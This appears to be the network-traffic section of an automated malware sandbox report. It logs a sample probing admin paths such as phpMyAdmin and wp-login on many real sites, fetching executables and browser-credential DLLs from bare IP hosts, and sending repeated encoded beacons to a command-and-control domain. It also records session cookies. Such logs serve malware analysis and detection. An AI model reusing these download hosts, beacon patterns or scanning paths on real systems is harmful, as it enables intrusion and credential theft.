                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://account.booking.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.0Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=f..OOXkXYg7C3sValW.JT9TBRtH489XDoqC0_PadtzA-1707131771-1-AdQ98SPZEFYHOKf/EpHVT80tuCLrv/AjblCtE2qBlyK+nQbJmWAUNuqsO2PsiP4D2Zes8WDOJjq83a7ZAzYrEUo=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EA298EECDFAB0EDA1FF6AD3E90D0B14C56C348EF11DCF1C015A556B18100061CDUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipCookie: INGRESSCOOKIE=1707131772.255.15159.541229|f85a63221c8fd9b049d9a82e34821ae3; csrfToken=gyl8dbRELIEkZ6gzYC5izLX9; language=en|en; lng=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipCookie: incap_ses_1816_2786379=7R8kW7naZWqCfxA+arozGXvDwGUAAAAAo66y6WgRP5rMrf2DD5XNTw==; visid_incap_2786379=nJ2nIEwwQtOC8ksVLl53JHrDwGUAAAAAQUIPAAAAAACXTPPl6ZJPhBOZf1gL0Zya; nlbi_2786379=Gm27FDXtdluMyfn/aJQkpgAAAAB2SWEC4z8u2KD9iiENxNubUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipCookie: __sdcfduid=f7108151c41711eea0b60fe64c998bd492e66eddc076b200708bdc05ed2cbe73d6bf4f0f17b0d993defd8d35f71a55a6; __dcfduid=f7108150c41711eea0b60fe64c998bd4; __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://discord.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mw.redsa.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: mitextoescolar.mineduc.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /Error/NotFound?aspxerrorpath=/phpmyadmin/ HTTP/1.0Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=qAyyVUMtN.VwwaJ3DSunEJzUejWU4vbQ3oi8vft7Zmk-1707131771-1-AUpaUHNP7XBH7VoYl7WtbTOFNZTDujAHBqvdFHtA2TvZkyao3SyXavbmho30yF0TtYC7avtf6LVm95z/tp5urOI=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://accounts.google.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.0Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE08EBDD9B7BE8AFE3F88D069A772BAB632F18933680BD0BFD5F16AEC6C3BF27FFUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=sPlAOmI.SbF_K0Yty9SLocQQuQdWvCM6UlqNiDKSrHQ-1707131771-1-AZvJvOdJHH+VSfQDYfBdRd41atdb1A/vcpLWtYycbqzt0xc3vhWXbndMTivUeKm3/bUkXK+WsVKIU5M1CWciaxI=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mobilsam.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/login HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipCookie: JSESSIONID=m6ZW6nO9UoY9k-niVSF6oRF4.cmrsanmartinUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipCookie: incap_ses_1816_2786379=GmwLPGm/8ysfgRA+arozGXzDwGUAAAAAWc95nFYQh4VkaUEfADF5kQ==; visid_incap_2786379=hlpIXcn9RyeS5pqQjLHvrXzDwGUAAAAAQUIPAAAAAADprIzRk3UO2rMvvlyroBMr; nlbi_2786379=qQ7OL9ri/xfPwc9vaJQkpgAAAAAT6+z8Xi/STIi/imJ8KXK7User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE10F8662CA549F3FD503336620C511FF443E7315D4F16653F0D42A1913B3F30D1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: poligrafosecuador.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: testconnect.garena.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://3fba-180-252-166-236.ngrok.io/wp-login.php
                Source: global trafficHTTP traffic detected: GET /data/pdf/may.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: real.avalmag.com
                Source: global trafficHTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.172.128.19
                Source: global trafficHTTP traffic detected: GET /check/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: trmpc.com
                Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=four&s=ab HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.127Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /ping.php?substr=four HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 5.42.64.33Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef810c3ee939b3c HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
